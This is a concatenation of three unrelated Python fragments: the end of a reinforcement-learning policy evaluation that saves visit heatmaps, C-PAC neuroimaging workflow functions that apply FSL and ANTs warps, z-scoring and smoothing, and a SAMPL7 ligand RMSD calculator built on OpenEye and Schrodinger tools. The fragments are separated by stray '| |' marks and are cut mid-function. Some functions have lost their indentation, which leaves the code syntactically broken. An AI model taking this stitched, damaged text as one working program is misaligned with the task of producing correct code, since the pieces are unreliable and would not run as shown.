        # NOTE(review): renders every step regardless of the `render` flag — confirm intended.
        env.render('human')
        actions, states = model.predict(observations, state=states, deterministic=deterministic)
        observations, rewards, dones, infos = env.step(actions)
        current_rewards += rewards
        current_lengths += 1
        for i in range(n_envs):
            total_steps[current_episode] += 1
            # NOTE(review): always reads sub-env 0 (`[0]`); with n_envs > 1 the
            # positions of other sub-envs are never recorded — confirm n_envs == 1.
            grid[current_episode][env.get_attr("agent_pos")[0][1]][env.get_attr("agent_pos")[0][0]] += 1
            if episode_counts[i] < episode_count_targets[i]:
                # unpack values so that the callback can access the local variables
                reward = rewards[i]
                done = dones[i]
                info = infos[i]
                if callback is not None:
                    callback(locals(), globals())
                if dones[i]:
                    if is_monitor_wrapped:
                        # Atari wrapper can send a "done" signal when
                        # the agent loses a life, but it does not correspond
                        # to the true end of episode
                        if "episode" in info.keys():
                            # Do not trust "done" with episode endings.
                            # Monitor wrapper includes "episode" key in info if environment
                            # has been wrapped with it. Use those rewards instead.
                            episode_rewards.append(info["episode"]["r"])
                            episode_lengths.append(info["episode"]["l"])
                            # Only increment at the real end of an episode
                            episode_counts[i] += 1
                    else:
                        episode_rewards.append(current_rewards[i])
                        episode_lengths.append(current_lengths[i])
                        episode_counts[i] += 1
                    current_episode += 1
                    current_rewards[i] = 0
                    current_lengths[i] = 0
                    if states is not None:
                        states[i] *= 0
        if render:
            env.render()
    print("Saving heatmaps... ")
    heatmap_path = os.path.join(path, "heatmap")
    # NOTE(review): raises if the directory already exists (no exist_ok).
    os.makedirs(heatmap_path)
    def save_heatmap(i):
        # Drop the outer 1-cell border (walls) and normalize by episode length.
        fig, ax = plt.subplots()
        x = list(range(1, env.get_attr("height")[0] - 1))
        y = list(range(1, env.get_attr("width")[0] - 1))
        real_grid = grid[i, 1:len(x) + 1, 1:len(y) + 1] / total_steps[i]
        im, cbar = heatmap_(real_grid, x, y, cmap="YlGn", cbarlabel="# of steps [%] with total {}".format(total_steps[i]))
        texts = annotate_heatmap(im, valfmt="{x:.3f}")
        fig.tight_layout()
        plt.savefig(os.path.join(heatmap_path, '{}.png'.format(i)))
    for i in range(n_eval_episodes):
        save_heatmap(i)
    print("Done.")
    mean_reward = np.mean(episode_rewards)
    std_reward = np.std(episode_rewards)
    if reward_threshold is not None:
        assert mean_reward > reward_threshold, "Mean reward below threshold: " f"{mean_reward:.2f} < {reward_threshold:.2f}"
    if return_episode_rewards:
        return episode_rewards, episode_lengths
    return mean_reward, std_reward
def evaluate_policy_gif_heatmap(
model: "base_class.BaseAlgorithm",
env: Union[gym.Env, VecEnv],
n_eval_episodes: int = 10,
deterministic: bool = True,
render: bool = False,
callback: Optional[Callable[[Dict[str, Any], Dict[str, Any]], None]] = None,
reward_threshold: Optional[float] = None,
return_episode_rewards: bool = False,
warn: bool = True,
path: str = '',
gif: bool = True,
heatmap: bool = True
) -> Union[Tuple[float, float], Tuple[List[float], List[int]]]:
"""
Runs policy for ``n_eval_episodes`` episodes and returns average reward.
If a vector env is passed in, this divides the episodes to evaluate onto | |
import nipype.interfaces.fsl as fsl
import nipype.pipeline.engine as pe
import nipype.interfaces.utility as util
from nipype.interfaces.afni import preprocess
from CPAC.registration import create_nonlinear_register, \
create_register_func_to_anat, \
create_bbregister_func_to_anat, \
create_wf_calculate_ants_warp, \
create_wf_apply_ants_warp, \
create_wf_c3d_fsl_to_itk, \
create_wf_collect_transforms
from CPAC.utils import Configuration, function, find_files
from CPAC.utils.utils import extract_one_d, set_gauss, \
process_outputs, get_scan_params, \
get_tr, extract_txt, create_log, \
create_log_template, extract_output_mean, \
create_output_mean_csv, get_zscore, \
get_fisher_zscore, dbg_file_lineno, add_afni_prefix
# Apply warps, Z-scoring, Smoothing, Averages
def output_to_standard(workflow, output_name, strat, num_strat, pipeline_config_obj,
                       map_node=False, input_image_type=0):
    """Warp a resource-pool output into standard (template) space.

    Uses the ANTS pathway when the strategy already applied an ANTS
    functional-to-standard warp, otherwise falls back to FSL ApplyWarp.
    Registers the result as ``<output_name>_to_standard`` in the strategy.

    :param workflow: nipype Workflow to connect nodes into
    :param output_name: resource pool key of the image to transform
    :param strat: strategy object holding the resource pool
    :param num_strat: strategy index, used to keep node names unique
    :param pipeline_config_obj: pipeline configuration (templates, ANTS threads)
    :param map_node: build the transform nodes as MapNodes over their inputs
    :param input_image_type: ITK image type code for the c3d/ANTS conversion
    :return: the updated strategy
    """
    nodes = strat.get_nodes_names()
    if 'apply_ants_warp_functional_to_standard' in nodes:
        # ANTS WARP APPLICATION
        # convert the func-to-anat linear warp from FSL FLIRT to
        # ITK (ANTS) format
        fsl_to_itk_convert = create_wf_c3d_fsl_to_itk(input_image_type,
                                                      map_node,
                                                      name='{0}_fsl_to_itk_{1}'.format(output_name, num_strat))
        # collect the list of warps into a single stack to feed into the
        # ANTS warp apply tool
        collect_transforms = create_wf_collect_transforms(map_node,
                                                          name='{0}_collect_transforms_{1}'.format(output_name, num_strat))
        # ANTS apply warp
        apply_ants_warp = create_wf_apply_ants_warp(map_node,
                                                    name='{0}_to_standard_{1}'.format(
                                                        output_name, num_strat),
                                                    ants_threads=int(pipeline_config_obj.num_ants_threads))
        apply_ants_warp.inputs.inputspec.dimension = 3
        apply_ants_warp.inputs.inputspec.interpolation = 'Linear'
        apply_ants_warp.inputs.inputspec.reference_image = \
            pipeline_config_obj.template_brain_only_for_func
        apply_ants_warp.inputs.inputspec.input_image_type = \
            input_image_type
        # affine from FLIRT func->anat linear registration
        node, out_file = strat['functional_to_anat_linear_xfm']
        workflow.connect(node, out_file, fsl_to_itk_convert,
                         'inputspec.affine_file')
        # reference used in FLIRT func->anat linear registration
        node, out_file = strat['anatomical_brain']
        workflow.connect(node, out_file, fsl_to_itk_convert,
                         'inputspec.reference_file')
        # output file to be converted
        node, out_file = \
            strat[output_name]
        workflow.connect(node, out_file, fsl_to_itk_convert,
                         'inputspec.source_file')
        # nonlinear warp from anatomical->template ANTS registration
        node, out_file = strat['anatomical_to_mni_nonlinear_xfm']
        workflow.connect(node, out_file, collect_transforms,
                         'inputspec.warp_file')
        # linear initial from anatomical->template ANTS registration
        node, out_file = strat['ants_initial_xfm']
        workflow.connect(node, out_file, collect_transforms,
                         'inputspec.linear_initial')
        # linear affine from anatomical->template ANTS registration
        node, out_file = strat['ants_affine_xfm']
        workflow.connect(node, out_file, collect_transforms,
                         'inputspec.linear_affine')
        # rigid affine from anatomical->template ANTS registration
        node, out_file = strat['ants_rigid_xfm']
        workflow.connect(node, out_file, collect_transforms,
                         'inputspec.linear_rigid')
        # converted FLIRT func->anat affine, now in ITK (ANTS) format
        workflow.connect(fsl_to_itk_convert,
                         'outputspec.itk_transform',
                         collect_transforms,
                         'inputspec.fsl_to_itk_affine')
        # output file to be converted
        node, out_file = strat[output_name]
        workflow.connect(node, out_file, apply_ants_warp,
                         'inputspec.input_image')
        # collection of warps to be applied to the output file
        workflow.connect(collect_transforms,
                         'outputspec.transformation_series',
                         apply_ants_warp,
                         'inputspec.transforms')
        strat.update_resource_pool({
            '{0}_to_standard'.format(output_name): (apply_ants_warp, 'outputspec.output_image')
        })
        strat.append_name(apply_ants_warp.name)
        # NOTE(review): this increments only the local binding; num_strat is not
        # read again before return, so the increment has no effect — confirm.
        num_strat += 1
    else:
        # FSL WARP APPLICATION
        if map_node:
            apply_fsl_warp = pe.MapNode(interface=fsl.ApplyWarp(),
                                        name='{0}_to_standard_{1}'.format(output_name, num_strat),
                                        iterfield=['in_file'])
        else:
            apply_fsl_warp = pe.Node(interface=fsl.ApplyWarp(),
                                     name='{0}_to_standard_{1}'.format(output_name,
                                                                       num_strat))
        apply_fsl_warp.inputs.ref_file = \
            pipeline_config_obj.template_skull_for_func
        # output file to be warped
        node, out_file = strat[output_name]
        workflow.connect(node, out_file, apply_fsl_warp, 'in_file')
        # linear affine from func->anat linear FLIRT registration
        node, out_file = strat['functional_to_anat_linear_xfm']
        workflow.connect(node, out_file, apply_fsl_warp, 'premat')
        # nonlinear warp from anatomical->template FNIRT registration
        node, out_file = strat['anatomical_to_mni_nonlinear_xfm']
        workflow.connect(node, out_file, apply_fsl_warp, 'field_file')
        strat.update_resource_pool({'{0}_to_standard'.format(output_name): (apply_fsl_warp, 'out_file')})
        strat.append_name(apply_fsl_warp.name)
    return strat
def z_score_standardize(workflow, output_name, mask_name,
                        strat, num_strat, map_node=False):
    """Attach a z-scoring sub-workflow for ``output_name`` to the strategy.

    Fix: the mask-key check now uses ``isinstance(mask_name, str)`` instead of
    ``type(mask_name) == str`` — the idiomatic type check, which also accepts
    str subclasses.

    :param workflow: nipype Workflow to connect nodes into
    :param output_name: resource pool key of the image to standardize
    :param mask_name: resource pool key of the mask, or a node exposing a
        ``local_path`` output with a direct file path
    :param strat: strategy object holding the resource pool
    :param num_strat: strategy index, used to keep node names unique
    :param map_node: build the z-score sub-workflow as a MapNode
    :return: the updated strategy with ``<output_name>_zstd`` registered
    """
    # call the z-scoring sub-workflow builder
    z_score_std = get_zscore(output_name, map_node,
                             'z_score_std_%s_%d' % (output_name, num_strat))
    node, out_file = strat[output_name]
    workflow.connect(node, out_file,
                     z_score_std, 'inputspec.input_file')
    # get the mask
    if isinstance(mask_name, str):
        node, out_file = strat[mask_name]
        workflow.connect(node, out_file,
                         z_score_std, 'inputspec.mask_file')
    else:
        # mask_name is a direct file path and not the name of a
        # resource pool key
        workflow.connect(mask_name, 'local_path',
                         z_score_std, 'inputspec.mask_file')
    strat.append_name(z_score_std.name)
    strat.update_resource_pool({'{0}_zstd'.format(output_name): (z_score_std, 'outputspec.z_score_img')})
    return strat
def fisher_z_score_standardize(workflow, output_name, timeseries_oned_file,
                               strat, num_strat, map_node=False):
    """Attach a Fisher r-to-z standardization sub-workflow for a correlation output."""
    # build the fisher r-to-z sub-workflow
    fisher_z_score_std = get_fisher_zscore(output_name, map_node,
                                           'fisher_z_score_std_%s_%d' \
                                           % (output_name, num_strat))
    # correlation image to be transformed
    corr_node, corr_file = strat[output_name]
    workflow.connect(corr_node, corr_file, fisher_z_score_std,
                     'inputspec.correlation_file')
    # the timeseries the correlations were computed from
    ts_node, ts_file = strat[timeseries_oned_file]
    workflow.connect(ts_node, ts_file, fisher_z_score_std,
                     'inputspec.timeseries_one_d')
    strat.append_name(fisher_z_score_std.name)
    strat.update_resource_pool({
        '{0}_fisher_zstd'.format(output_name):
            (fisher_z_score_std, 'outputspec.fisher_z_score_img')
    })
    return strat
def output_smooth(workflow, output_name, mask_name, fwhm,
                  strat, num_strat, map_node=False):
    """Attach an FSL spatial-smoothing node for one output.

    Smooths the resource named by ``output_name`` within a mask using
    ``fsl.MultiImageMaths``, iterating over the configured ``fwhm`` values,
    registers the result as ``'<output_name>_smooth'``, and returns the
    updated strategy. ``mask_name`` is either a resource-pool key (str) or
    a datasource node providing the mask via its ``'local_path'`` output.
    """
    node_name = '{0}_smooth_{1}'.format(output_name, num_strat)
    if map_node:
        smooth_node = pe.MapNode(interface=fsl.MultiImageMaths(),
                                 name=node_name,
                                 iterfield=['in_file'])
    else:
        smooth_node = pe.Node(interface=fsl.MultiImageMaths(),
                              name=node_name)

    # TODO review connection to config, is the node really necessary?
    inputnode_fwhm = pe.Node(
        util.IdentityInterface(fields=['fwhm']),
        name='fwhm_input_{0}_{1}'.format(output_name, num_strat))
    inputnode_fwhm.iterables = ("fwhm", fwhm)

    # the resource to be smoothed
    src_node, src_file = strat[output_name]
    workflow.connect(src_node, src_file, smooth_node, 'in_file')

    # fwhm value converted to an fslmaths op string by set_gauss
    workflow.connect(inputnode_fwhm, ('fwhm', set_gauss),
                     smooth_node, 'op_string')

    if type(mask_name) is str:
        # mask_name is the name of a resource-pool key
        mask_node, mask_file = strat[mask_name]
        workflow.connect(mask_node, mask_file, smooth_node, 'operand_files')
    else:
        # mask_name is a direct file path provided by a datasource node
        workflow.connect(mask_name, 'local_path',
                         smooth_node, 'operand_files')

    strat.append_name(smooth_node.name)
    strat.update_resource_pool(
        {'{0}_smooth'.format(output_name): (smooth_node, 'out_file')})
    return strat
def calc_avg(workflow, output_name, strat, num_strat, map_node=False):
    """Calculate the average of an output using AFNI 3dmaskave.

    Wires a Maskave node followed by a small text-extraction node that
    writes the mean to a file; the mean is registered in the resource pool
    under ``'output_means.@<output_name>_average'`` and the updated
    strategy is returned.
    """
    avg_name = '{0}_mean_{1}'.format(output_name, num_strat)
    txt_name = '{0}_mean_to_txt_{1}'.format(output_name, num_strat)
    # function interface that pulls the scalar mean out of 3dmaskave output
    txt_iface = function.Function(input_names=['in_file', 'output_name'],
                                  output_names=['output_mean'],
                                  function=extract_output_mean,
                                  as_module=True)
    if map_node:
        avg_node = pe.MapNode(interface=preprocess.Maskave(),
                              name=avg_name, iterfield=['in_file'])
        txt_node = pe.MapNode(txt_iface, name=txt_name,
                              iterfield=['in_file'])
    else:
        avg_node = pe.Node(interface=preprocess.Maskave(), name=avg_name)
        txt_node = pe.Node(txt_iface, name=txt_name)

    txt_node.inputs.output_name = output_name

    src_node, src_file = strat[output_name]
    workflow.connect(src_node, src_file, avg_node, 'in_file')
    workflow.connect(avg_node, 'out_file', txt_node, 'in_file')

    strat.append_name(avg_node.name)
    strat.update_resource_pool({
        'output_means.@{0}_average'.format(output_name):
            (txt_node, 'output_mean')
    })
    return strat
def ants_apply_warps_func_mni(
    workflow, strat, num_strat, num_ants_cores,
    input_node, input_outfile,
    ref_node, ref_outfile, standard,
    func_name, interp,
    input_image_type
):
    """Apply the functional-to-structural and structural-to-template warps to
    the 4D functional time-series to warp it to template space.

    Parameters
    ----------
    workflow: Nipype workflow object
        the workflow containing the resources involved
    strat: C-PAC Strategy object
        a strategy with one or more resource pools
    num_strat: int
        the number of strategy objects
    num_ants_cores: int
        the number of CPU cores dedicated to ANTS anatomical-to-standard
        registration
    input_node: Nipype pointer
        pointer to the node containing the 4D functional time-series (often
        the leaf node)
    input_outfile: Nipype pointer
        pointer to the output of the node, i.e. the 4D functional time-series
        itself
    ref_node: Nipype pointer
        pointer to the node containing the reference volume for the C3D
        FSL-to-ITK affine conversion (often the mean of the functional
        time-series, which is a single volume)
    ref_outfile: Nipype pointer
        pointer to the output of ref_node, i.e. the reference volume itself
    standard: str
        file path to the template brain used for functional-to-template
        registration
    func_name: str
        what the name of the warped functional should be when written to the
        resource pool
    interp: str
        which interpolation to use when applying the warps
    input_image_type: int
        argument taken by the ANTs apply warp tool; in this case, should be
        3 for 4D functional time-series

    Returns
    -------
    Nipype workflow object
        the apply-warp sub-workflow; its 'outputspec.output_image' is also
        registered in the strategy's resource pool under `func_name`
    """
    # converts FSL-format .mat affine xfm into ANTS-format
    # .txt; .mat affine comes from Func->Anat registration
    fsl_to_itk_func_mni = create_wf_c3d_fsl_to_itk(
        name='fsl_to_itk_%s_%d' % (func_name, num_strat)
    )

    # collects series of warps to be applied
    collect_transforms_func_mni = \
        create_wf_collect_transforms(
            name='collect_transforms_%s_%d' % (func_name, num_strat)
        )

    # apply ants warps
    apply_ants_warp_func_mni = \
        create_wf_apply_ants_warp(
            name='apply_ants_warp_%s_%d' % (func_name, num_strat),
            ants_threads=int(num_ants_cores))

    apply_ants_warp_func_mni.inputs.inputspec.reference_image = standard
    apply_ants_warp_func_mni.inputs.inputspec.dimension = 3
    apply_ants_warp_func_mni.inputs.inputspec.interpolation = interp
    # input_image_type:
    # (0 or 1 or 2 or 3)
    # Option specifying the input image type of scalar
    # (default), vector, tensor, or time series.
    apply_ants_warp_func_mni.inputs.inputspec. \
        input_image_type = input_image_type

    # convert the .mat from linear Func->Anat to
    # ANTS format
    node, out_file = strat['functional_to_anat_linear_xfm']
    workflow.connect(node, out_file, fsl_to_itk_func_mni,
                     'inputspec.affine_file')

    # anatomical brain acts as the reference space for the conversion
    node, out_file = strat["anatomical_brain"]
    workflow.connect(node, out_file, fsl_to_itk_func_mni,
                     'inputspec.reference_file')

    # single-volume reference (e.g. mean functional) for the C3D conversion
    workflow.connect(ref_node, ref_outfile,
                     fsl_to_itk_func_mni,
                     'inputspec.source_file')

    # Field file from anatomical nonlinear registration
    node, out_file = strat['anatomical_to_mni_nonlinear_xfm']
    workflow.connect(node, out_file,
                     collect_transforms_func_mni,
                     'inputspec.warp_file')

    # initial transformation from anatomical registration
    node, out_file = strat['ants_initial_xfm']
    workflow.connect(node, out_file,
                     collect_transforms_func_mni,
                     'inputspec.linear_initial')

    # affine transformation from anatomical registration
    node, out_file = strat['ants_affine_xfm']
    workflow.connect(node, out_file,
                     collect_transforms_func_mni,
                     'inputspec.linear_affine')

    # rigid transformation from anatomical registration
    node, out_file = strat['ants_rigid_xfm']
    workflow.connect(node, out_file,
                     collect_transforms_func_mni,
                     'inputspec.linear_rigid')

    # Premat from Func->Anat linear reg and bbreg
    # (if bbreg is enabled)
    workflow.connect(fsl_to_itk_func_mni,
                     'outputspec.itk_transform',
                     collect_transforms_func_mni,
                     'inputspec.fsl_to_itk_affine')

    # this <node, out_file> pulls in directly because
    # it pulls in the leaf in some instances
    workflow.connect(input_node,
                     input_outfile,
                     apply_ants_warp_func_mni,
                     'inputspec.input_image')

    workflow.connect(collect_transforms_func_mni,
                     'outputspec.transformation_series',
                     apply_ants_warp_func_mni,
                     'inputspec.transforms')

    strat.update_resource_pool({
        func_name: (apply_ants_warp_func_mni, 'outputspec.output_image')
    })
    strat.append_name(apply_ants_warp_func_mni.name)

    return apply_ants_warp_func_mni
def ants_apply_inverse_warps_template_to_func(
workflow, strat, num_strat, num_ants_cores, input_node, input_outfile,
ref_node, ref_outfile, func_name, interp, input_image_type
):
"""Apply the functional-to-structural and structural-to-template warps
inversely to functional time-series in template space to warp it back to
native functional space.
Parameters
----------
workflow: Nipype workflow object
the workflow containing the resources involved
strat: C-PAC Strategy object
a strategy with one or more resource pools
num_strat: int
the number of strategy objects
num_ants_cores: int
the number of CPU cores dedicated to ANTS anatomical-to-standard
registration
input_node: Nipype pointer
pointer to the node containing the 4D functional time-series (often
the leaf node)
input_outfile: Nipype pointer
pointer to the output of the node, i.e. the 4D functional time-series
itself
ref_node: Nipype pointer
pointer to the node containing the reference volume for the C3D
FSL-to-ITK affine conversion (often the mean of the functional
time-series, which is a single volume)
ref_outfile: Nipype pointer
pointer to the output of ref_node, i.e. the reference volume itself
func_name: str
what the name of the warped functional should be when written | |
# Source: SAMPL7 repository -- protein_ligand/Analysis/Scripts/pkganalysis/RMSD_calculator.py
#!/usr/bin/env python
__author__ = "<NAME>"
__email__ = "<EMAIL>"
import shutil
import glob
import pickle
import logging
import sys
import os
import time
import subprocess
import argparse
def mcs(ref_mol, fit_mol):
    """Run an OpenEye maximum-common-substructure search between two molecules.

    Hydrogens are suppressed on both inputs, then every MCS match of the
    reference is paired with every MCS match of the fit molecule, and the
    atom pairs of each pairing are accumulated into an OEMatch.

    Returns a dict mapping each OEMatch to ["match1_<i>_vs_match2_<j>", []]
    (the second element, check_list, is never populated here).

    Side effect: writes debug PDBs "match1_<i>.pdb" / "match2_<j>.pdb" into
    the current working directory; main_rmsd() cleans these up afterwards.
    """
    #do the mcs search and return OEMatch object.
    #ignore Hydrogen
    OESuppressHydrogens(fit_mol)
    OESuppressHydrogens(ref_mol)
    #set atom and bond expression
    atomexpr = OEExprOpts_AtomicNumber
    bondexpr = 0
    #do the mcs search, using defined atom, bond expression options
    mcss = OEMCSSearch(ref_mol, atomexpr, bondexpr, True)
    mcss.SetMCSFunc(OEMCSMaxAtomsCompleteCycles(1.5))
    #create a new match object to store mcs search info.
    new_match_list = []
    new_match_dic = {}
    i = 0
    j = 0
    for match1 in mcss.Match(ref_mol):
        i += 1
        #write out match1 molecule
        mol1 = OEGraphMol()
        OESubsetMol(mol1, match1, True)
        ofs1 = oemolostream("match1_%s.pdb" % i)
        OEWriteMolecule(ofs1, mol1)
        ofs1.close()
        for match2 in mcss.Match(fit_mol):
            j += 1
            check_list = []
            #write out match2 molecule
            new_match = OEMatch()
            mol2 = OEGraphMol()
            OESubsetMol(mol2, match2, True)
            ofs2 = oemolostream("match2_%s.pdb" % j)
            OEWriteMolecule(ofs2, mol2)
            ofs2.close()
            for mp1, mp2 in zip(match1.GetAtoms(), match2.GetAtoms()):
                # NOTE(review): ref_name/fit_name are computed but unused --
                # presumably left over from an earlier name-consistency check.
                ref_name = mp1.target.GetName().strip()
                fit_name = mp2.target.GetName().strip()
                new_match.AddPair(mp1.target, mp2.target)
            #store the match info
            new_match_list.append(new_match)
            new_match_dic[new_match] = (["match1_%s_vs_match2_%s" % (i, j), check_list])
    return new_match_dic
def rmsd_mcss(ref_struc, fit_struc):
    """Compute the RMSD between a reference and a fitted ligand structure.

    Uses the OpenEye MCS search (see mcs()) to obtain all candidate atom
    mappings between the two molecules, computes one RMSD per mapping, and
    returns the smallest. Returns False when no mapping (or no molecule in
    the fit file) is available -- callers treat False as a failure marker.
    """
    print('we are now in the rmsd_mcss', ref_struc, fit_struc)
    reffs = oemolistream()
    reffs.open(ref_struc)
    fitfs = oemolistream()
    fitfs.open(fit_struc)
    refmol = OEGraphMol()
    OEReadMolecule(reffs, refmol)
    for fitmol in fitfs.GetOEGraphMols():
        # all candidate atom mappings between reference and fit molecule
        ss = mcs(refmol, fitmol)
        # one RMSD per candidate mapping
        mcss_rmsd_list = [OERMSD(refmol, fitmol, match) for match in ss]
        print(ref_struc)
        print(fit_struc)
        print(mcss_rmsd_list)
        # BUG FIX: this was `try: return min(...) except: return False` -- a
        # bare except that swallowed *every* error (even KeyboardInterrupt),
        # not just the expected empty-list ValueError. Test explicitly instead.
        if mcss_rmsd_list:
            return min(mcss_rmsd_list)
        return False
    # the fit stream contained no molecules at all
    return False
def wait_and_check(filename, timestep=100, how_many_times=1000):
    """Poll until *filename* exists, sleeping *timestep* seconds between checks.

    Returns True as soon as the file is found (immediately if it already
    exists); returns False after *how_many_times* unsuccessful checks.
    """
    for attempt in range(how_many_times):
        if os.path.isfile(filename):
            print('we are now exiting at this count:', filename, attempt)
            return True
        # not there yet -- relax, then report how long we have waited
        time.sleep(timestep)
        print('Inside the wait loop check the current wait time', filename, attempt, attempt * timestep)
    return False
def extract_ligand_from_complex(complex_pdb_file, ligand_pdb_file, ligand_info="UNL"):
    """Extract the ligand records from a complex PDB file into their own file.

    Parameters
    ----------
    complex_pdb_file: str
        path of the protein-ligand complex PDB to read
    ligand_pdb_file: str
        path the extracted ligand lines are written to
    ligand_info: str
        either a bare residue name ("UNL" -- the name OpenEye assigns to
        unknown ligands, the default) or "RESNAME-RESNUM" to additionally
        match the residue number (PDB columns 23-26)
    """
    print('we are now entering extract ligand from complex', complex_pdb_file, ligand_pdb_file)
    with open(complex_pdb_file, "r") as complex_file:
        complex_lines = complex_file.readlines()
    ligid = ligand_info.split("-")
    # BUG FIX: the default "UNL" contains no "-", so the old unconditional
    # ligid[1] access raised IndexError; only filter on the residue number
    # when one was actually supplied.
    want_resnum = ligid[1] if len(ligid) > 1 else None
    ligand_lines = []
    for complex_line in complex_lines:
        # PDB fixed columns: [17:20] residue name, [22:26] residue sequence number
        if complex_line[17:20].strip() != ligid[0]:
            continue
        if want_resnum is not None and complex_line[22:26].strip() != want_resnum:
            continue
        ligand_lines.append(complex_line)
    with open(ligand_pdb_file, "w") as ligand_file:
        ligand_file.writelines(ligand_lines)
def convert_ligand_format(input_ligand, output_ligand):
    """Convert a ligand file between formats via an OpenEye read/write round trip.

    The target format is inferred by OpenEye from each file's extension.
    Returns True on success, False when the input cannot be read or the
    output cannot be written.
    """
    print('We are now converting the ligand format:', input_ligand, output_ligand)
    try:
        mol = OEMol()
        ifile = oemolistream(input_ligand)
        OEReadMolecule(ifile, mol)
        ifile.close()
    except Exception:
        # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate
        logging.info(f"This ligand '{input_ligand}' cannot be read; check the format")
        return False
    try:
        ofile = oemolostream(output_ligand)
        OEWriteMolecule(ofile, mol)
        # BUG FIX: the output stream was never closed, so the converted file
        # could stay unflushed until interpreter exit.
        ofile.close()
    except Exception:
        logging.info(f"This ligand '{input_ligand}' cannot be written to '{output_ligand}'; please check format and the validity of the molecule.")
        return False
    return True
def merge_two_pdb(receptor, ligand, complex_pdb):
    """Concatenate a receptor PDB and a ligand PDB into one complex file.

    Protein records are kept minus CONECT/ENDMDL/END lines, a TER record is
    inserted, then ligand records are appended minus REMARK/MODEL/CONECT/
    ENDMDL/END lines (some participant files carry corrupted REMARK blocks,
    hence the filtering).
    """
    print('we need to merge two pdbs:', receptor, ligand, complex_pdb)
    complex_lines = []
    with open(receptor, "r") as receptor_file:
        protein_lines = receptor_file.readlines()
    for p_line in protein_lines:
        if p_line[:6] not in ["CONECT", "ENDMDL"] and p_line[:3] not in ["END"]:
            complex_lines.append(p_line)
    # separate the chains as the PDB format expects
    complex_lines.append("TER \n")
    with open(ligand, "r") as ligand_file:
        ligand_lines = ligand_file.readlines()
    for l_line in ligand_lines:
        # BUG FIX: the END test used to compare the whole line
        # (`l_line not in ["END"]`), so "END\n" records slipped through;
        # use the same prefix test as the protein branch above.
        if l_line[:6] not in ["REMARK", "MODEL ", "CONECT", "ENDMDL"] and l_line[:3] not in ["END"]:
            complex_lines.append(l_line)
    with open(complex_pdb, "w") as out_file:
        out_file.writelines(complex_lines)
def align_protein(template_complex, input_complex, output_complex):
    """Align *input_complex* onto *template_complex* via Schrodinger's
    binding-site alignment utility, writing the result to *output_complex*.

    Returns the combined stdout/stderr text of the external command.
    """
    print('we are attempting the following alignment:', template_complex, input_complex, output_complex)
    command = "$SCHRODINGER/utilities/align_binding_sites %s %s -o %s" % (
        template_complex, input_complex, output_complex)
    return subprocess.getoutput(command)
def rmsd_calculation(input_ligand, template_ligand, input_protein, template_protein_complex, realignment=False):
    """Compute the RMSD between a submitted ligand pose and the template ligand.

    With ``realignment=True`` the submitted ligand is first merged with its
    protein, the resulting complex is aligned onto the template complex with
    Schrodinger's binding-site alignment, and the RMSD is computed on the
    re-aligned, re-extracted ligand. Otherwise the RMSD is computed directly
    between the two ligand files.

    Returns the RMSD value, or the string "N/A" on any failure. A per-pair
    log file ("<input>_vs_<template>[_aligned].log") is written either way.
    """
    #print(input_ligand)
    #print(template_ligand)
    #print(input_protein)
    #quit()
    input_ligand_title, input_ligand_extension = os.path.splitext(input_ligand)
    template_ligand_title, template_ligand_extension = os.path.splitext(template_ligand)
    if realignment:
        ###do the realignment first###
        #step 1: combine ligand and protein
        input_ligand_pdb = input_ligand_title + "_ligand.pdb"
        try:
            #step 2: convert mol file into pdb format
            convert_ligand_format(input_ligand, input_ligand_pdb)
            logging.info("Successfully convert %s to %s..."%(input_ligand, input_ligand_pdb))
        except:
            logging.info("\tFatal Error: This ligand %s cannot be convert to pdb format"%(input_ligand))
            return "N/A"
        input_ligand_protein_complex = input_ligand_title + "_complex.pdb"
        #step 3: merge the ligand and receptor together
        merge_two_pdb(input_protein, input_ligand_pdb, input_ligand_protein_complex)
        aligned_ligand_protein_complex = input_ligand_title + "_vs_" + template_ligand_title + "_complex_aligned.pdb"
        #step 4: align the input complex onto template complex
        try:
            align_protein(template_protein_complex, input_ligand_protein_complex, aligned_ligand_protein_complex)
            #set a relaxing time to let the alignment finish
            #default to check every 5 second and maximum calculation time is 500 second
            # NOTE(review): the comment above says 5 s / 500 s, but the values
            # below poll every 100 s up to 1000 times -- confirm the intent.
            time_check_frequence = 100
            how_many_check_point = 1000
            total_wait_time = time_check_frequence * how_many_check_point
            if wait_and_check(aligned_ligand_protein_complex, timestep=time_check_frequence, how_many_times=how_many_check_point):
                logging.info("Successfully align %s onto %s and get the aligned structure %s"%(input_ligand_protein_complex, template_protein_complex, aligned_ligand_protein_complex))
            else:
                logging.info("The alignment from %s onto %s didn't finish in %s second... Need to break"%(input_ligand_protein_complex, template_protein_complex, total_wait_time))
                return "N/A"
        except:
            logging.info("\tFatal Error: Cannot align %s onto %s"%(input_ligand_protein_complex, template_protein_complex))
            return "N/A"
        #step 5: split the aligned protein to get aligned ligand
        aligned_input_ligand = input_ligand_title + "_vs_" + template_ligand_title + "_ligand_aligned.pdb"
        try:
            extract_ligand_from_complex(aligned_ligand_protein_complex, aligned_input_ligand, ligand_info="UNL")
            logging.info("Successfully extract ligand file %s from aligned complex %s"%(aligned_input_ligand, aligned_ligand_protein_complex))
        except:
            logging.info("\tFatal Error: Cannot extract ligand file %s from aligned complex %s"%(aligned_input_ligand, aligned_ligand_protein_complex))
            return "N/A"
        #step 6: calculate the RMSD between the aligned ligand and the template ligand
        try:
            print('step 6:', template_ligand, aligned_input_ligand)
            rmsd = rmsd_mcss(template_ligand, aligned_input_ligand)
            logging.info("Successfully calculate the rmsd between template ligand %s and input aligned ligand %s, get the rmsd = %s"%(template_ligand, aligned_input_ligand, rmsd))
        except:
            logging.info("\tFatal Error: Cannont get the rmsd between template ligand %s and input aligned ligand %s"%(template_ligand, aligned_input_ligand))
            rmsd = "N/A"
        #step 7: write out result to a log file
        out_log = open("%s_vs_%s_aligned.log"%(input_ligand_title, template_ligand_title), "w")
        out_log.writelines("rmsd: %s"%rmsd)
        out_log.close()
    else:
        #calculate the ligand RMSD without realignment
        try:
            rmsd = rmsd_mcss(template_ligand, input_ligand)
            logging.info("Successfully calculate the rmsd between template ligand %s and input ligand %s, get the rmsd = %s"%(template_ligand, input_ligand, rmsd))
        except:
            logging.info("\tFatal Error: Cannont get the rmsd between template ligand %s and input ligand %s"%(template_ligand, input_ligand))
            rmsd = "N/A"
        out_log = open("%s_vs_%s.log"%(input_ligand_title,template_ligand_title), "w")
        out_log.writelines("rmsd: %s"%rmsd)
        out_log.close()
    return rmsd
def copy_template(template_folder_path, submitted_folder_path):
    """Copy every entry of the template folder into the submission folder."""
    for template_file in glob.glob("%s/*" % template_folder_path):
